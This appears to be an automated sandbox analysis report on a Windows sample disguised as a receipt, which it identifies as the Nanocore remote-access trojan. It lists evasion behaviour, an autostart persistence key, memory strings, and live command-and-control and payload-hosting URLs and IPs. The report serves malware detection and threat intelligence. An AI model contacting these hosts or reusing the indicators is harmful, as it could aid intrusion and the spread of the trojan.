Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\eReceiptpdf.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Source: Amcache.hve.11.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.11.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: eReceiptpdf.exe, 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: dhcpmon.exe, 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpmon.exe.4f77190.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e016e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40ea9e1.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.eReceiptpdf.exe.5144460.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.dhcpmon.exe.40e4fab.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.310947672.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.353019533.0000000004099000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300635347.0000000005144000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.324519764.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.303431509.00000000070F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.351180873.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.346857175.0000000006FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.341009071.0000000004F77000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.352765466.0000000003091000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eReceiptpdf.exe PID: 7124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6048, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection112	Masquerading2	Input Capture11	Security Software Discovery231	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion131	Security Account Manager	Virtualization/Sandbox Evasion131	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol23	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	22%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
18.2.dhcpmon.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108376		Download File

Domains

Source	Detection	Scanner	Label	Link
zeegod.duckdns.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
	0%	Avira URL Cloud	safe
http://tempuri.org/DetailsDataSet1.xsd	0%	Avira URL Cloud	safe
zeegod.duckdns.org	2%	Virustotal		Browse
zeegod.duckdns.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
zeegod.duckdns.org	45.133.1.211	true	true	2%, Virustotal, Browse	unknown
cdn.discordapp.com	162.159.129.233	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/893177342426509335/902653812936949891/4EB2FF9E.jpg	false		high
zeegod.duckdns.org	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://tempuri.org/DetailsDataSet1.xsd	dhcpmon.exe, dhcpmon.exe, 00000012.00000000.332045500.0000000000D42000.00000002.00020000.sdmp, eReceiptpdf.exe	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.11.dr	false		high
https://cdn.discordapp.com	eReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	eReceiptpdf.exe, 00000000.00000000.307592004.0000000003191000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000002.334852446.0000000002FC1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
45.133.1.211	zeegod.duckdns.org	Netherlands	35913	DEDIPATH-LLCUS	true
162.159.129.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	509854
Start date:	27.10.2021
Start time:	03:02:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	eReceiptpdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@14/13@19/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0%) Quality average: 0% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 99% Number of executed functions: 68 Number of non-executed functions: 2
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 40.126.26.135, 20.190.154.139, 20.190.154.137, 20.190.154.138, 20.190.154.18, 40.126.26.132, 20.190.154.19, 40.126.26.133, 52.168.117.173, 173.222.108.210, 173.222.108.226, 13.107.4.50, 20.54.110.249, 52.251.79.25, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183 Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, www.tm.lg.prod.aadmsa.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, b1ns.c-0001.c-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, b1ns.au-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:03:11	API Interceptor	990x Sleep call for process: eReceiptpdf.exe modified
03:03:11	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
03:03:28	API Interceptor	1x Sleep call for process: dhcpmon.exe modified
03:03:29	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.129.233	1PhgF7ujwW.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
	vhNyVU8USk.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
	Order 4503860408.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
	cotizacin.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
	SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
	7G5RoevPnu.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
	70% Balance Payment.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
	TT20201712.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
	ENQ-015August 2020 R1 Proj LOT.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
162.159.134.233	mvoElayshk.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/880877737378734114/880877802512060426/5mgcqk6jl.exe
